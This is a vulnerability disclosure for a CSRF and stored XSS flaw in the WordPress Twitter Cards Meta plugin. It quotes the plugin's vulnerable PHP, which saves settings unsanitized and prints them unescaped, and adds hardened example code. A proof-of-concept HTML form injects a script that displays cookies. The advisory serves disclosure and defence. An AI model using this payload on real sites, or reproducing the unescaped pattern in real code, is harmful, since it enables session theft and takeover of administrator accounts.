09 Dec

Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in Twitter Cards Meta

We recently found that the Twitter Cards Meta plugin contains a cross-site request forgery (CSRF)/cross-site scripting (XSS) vulnerability on the plugin’s settings page, /wp-admin/admin.php?page=twitter-cards-meta.

The CSRF portion of the vulnerability was due to a lack of a nonce on the page and a lack of a check for a valid one when processing a request to change the plugin’s settings.

For the XSS issue, the settings are saved in the file /twcm-options.php starting at line 28 (in version 2.4.5), and no sanitization is done on the submitted values:

if(isset($_POST['save_options']))
{
	$options=array(
			'site_twitter_username'=>trim($_POST['site_twitter_username']),
			'use_authors_twitter_account'=>isset($_POST['use_authors_twitter_account']) ? intval($_POST['use_authors_twitter_account']) : '',
			'use_image_from'=>$_POST['use_image_from'],
			'image_custom_field'=>trim($_POST['image_custom_field']),
			'default_image'=>(trim($_POST['default_image'])=='Link to Default Image')? '' : trim($_POST['default_image']),
			'home_page_description'=>(trim($_POST['home_page_description'])=='Enter a description for home page, keep it under 200 characters')? '' : wp_filter_nohtml_kses(trim($_POST['home_page_description'])),  #wp_filter_nohtml_kses is similar to the strip_tags() function
			'default_card_type'=>$_POST['default_card_type'],
			'use_default_card_type_sitewide'=>isset($_POST['use_default_card_type_sitewide']) ? $_POST['use_default_card_type_sitewide'] : ''
	);

When the values are output on the page by the same file, they are not escaped. For example, the value for “site_twitter_username” is output on line 68:

<tr><td  align="left" width="200">Site's Main Twitter Account:</td><td>@<input type="text" name="site_twitter_username" value="<?php echo ($twcm_options['site_twitter_username'])? $twcm_options['site_twitter_username'] :'WPDevTeam';?>" size="20"  onblur="javascript: if(this.value=='') {this.value='WPDevTeam';}" onclick="javascript: if(this.value=='WPDevTeam') {this.value='';}"  /></td></tr>
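As an added example (not the plugin’s own code), here is how the same save and output paths look with the checks WordPress provides: a nonce to stop CSRF, a capability check, sanitization of the submitted values, and attribute escaping on output. The option name twcm_options, the nonce action twcm_save_options and the nonce field name twcm_nonce are assumptions made for this example.

```php
<?php
// Hardened save path (example code, not the plugin's). The nonce action,
// nonce field name and option name are assumptions for this example.
if ( isset( $_POST['save_options'] ) ) {
	// CSRF: reject any request that does not carry a valid nonce for this
	// action. check_admin_referer() dies with an error page on failure.
	check_admin_referer( 'twcm_save_options', 'twcm_nonce' );

	// Only users who may manage options should be able to change settings.
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_die( 'You are not allowed to change these settings.' );
	}

	$options = array(
		// A Twitter handle never needs tags or quotes; strip them on input.
		'site_twitter_username' => sanitize_text_field( wp_unslash( $_POST['site_twitter_username'] ) ),
		// The default image is a URL, so keep only what is valid in one.
		'default_image'         => esc_url_raw( wp_unslash( $_POST['default_image'] ) ),
		// Plain-text description: strip tags, keep it to plain characters.
		'home_page_description' => sanitize_text_field( wp_unslash( $_POST['home_page_description'] ) ),
	);
	update_option( 'twcm_options', $options );
}

$twcm_options = get_option( 'twcm_options', array() );
$username     = ! empty( $twcm_options['site_twitter_username'] )
	? $twcm_options['site_twitter_username']
	: 'WPDevTeam';
?>
<form method="post">
	<?php
	// Emits the hidden nonce field that check_admin_referer() above verifies,
	// so a form on an attacker's site cannot produce a valid request.
	wp_nonce_field( 'twcm_save_options', 'twcm_nonce' );
	?>
	<tr><td align="left" width="200">Site's Main Twitter Account:</td>
	<td>@<input type="text" name="site_twitter_username"
		<?php // esc_attr() turns " into &quot;, so a stored value such as
		      // "><script>...</script> can no longer close the attribute. ?>
		value="<?php echo esc_attr( $username ); ?>" size="20" /></td></tr>
	<input type="submit" name="save_options" value="Save Options" />
</form>
```

Sanitizing on input and escaping on output are both needed: the first keeps junk out of the database, the second makes the stored value safe in the specific context (here an HTML attribute) where it is printed.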

Proof of Concept

The following proof of concept will cause an alert box with any accessible cookies to be shown on the page /wp-admin/admin.php?page=twitter-cards-meta, when submitted as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=twitter-cards-meta" method="POST">
<input type="hidden" name="save_options" value="Save Options" />
<input type="hidden" name="site_twitter_username" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • December 2, 2016 – Developer notified.
  • December 9, 2016 – WordPress.org Plugin Directory Notified.
  • December 9, 2016 – Plugin removed from WordPress.org Plugin Directory.
